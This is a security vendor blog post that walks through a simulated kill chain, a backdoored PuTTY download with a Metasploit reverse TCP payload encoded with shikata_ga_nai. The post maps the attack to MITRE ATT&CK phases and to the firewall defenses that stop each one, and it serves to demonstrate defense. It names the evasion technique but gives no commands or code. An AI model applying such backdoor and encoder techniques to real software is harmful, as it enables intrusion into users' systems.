X-Labs
Juli 28, 2021

Forcepoint NGFW MITRE ATT&CK simulation

Jenny Heino Principal Security Researcher

To illustrate Forcepoint’s NGFW advanced intrusion detection capabilities, I thought it might be helpful to simulate a kill chain attack to highlight layers of defense.

Intrusion Prevention with Forcepoint NGFW

In this scenario, an admin researches an issue, finds a potential solution on a forum. The solution provides a download link to PuTTY. Unfortunately, this file points to a malicious server and to a backdoored version of PuTTY.

The reverse TCP backdoor was added with msfvenom Metasploit framework using the shikata_ga_nai encoder, since it is typically difficult to detect. The attacker has a listener on his machine waiting for the executable to open a reverse TCP connection back home.

I used the MITRE ATT&CK framework to divide the simulation into sections. The following defense mechanisms are displayed during each phase:

1. Initial Access

  •  URL Filtering
  •  Deep Packet Inspection
  •  File Filtering (Sandbox)

2. Execution

  •  ECA Whitelisting
  • Snort Integration

3. Exfiltration

  •  DLP Integration

 

Here’s my kill chain video demo:


Of note: To create seamless and smooth demo, I silenced multiple defense mechanisms during deep packet inspection. A partial list of items that were not displayed in the video include:

  • IP Address lists
  •  Packet validation (IP & TCP)
  • Correlation situations
  • File reputation
  • Anti malware
  • User based restrictions
  • LS Decryption
  • Sidewinder proxy

Jenny Heino

Principal Security Researcher

Jenny Heino is a Principal Security Researcher at Forcepoint, specializing in network security and based in Finland. Although she completed her master's studies in the field of Mathematical Logic, she quickly found her passion in vulnerability research and joined the research team for the...

Read more articles by Jenny Heino

Über Forcepoint

Forcepoint ist einer der weltweit führenden Anbieter von Cyber-Sicherheit im Bereich Anwender- und Datensicherheit und hat es sich zur Aufgabe gemacht, Organisationen zu schützen und gleichzeitig die digitale Transformation und das Wachstum voranzutreiben. Unsere Lösungen passen sich in Echtzeit an das Nutzerverhalten an und ermöglichen Mitarbeitern einen sicheren Datenzugriff bei voller Produktivität.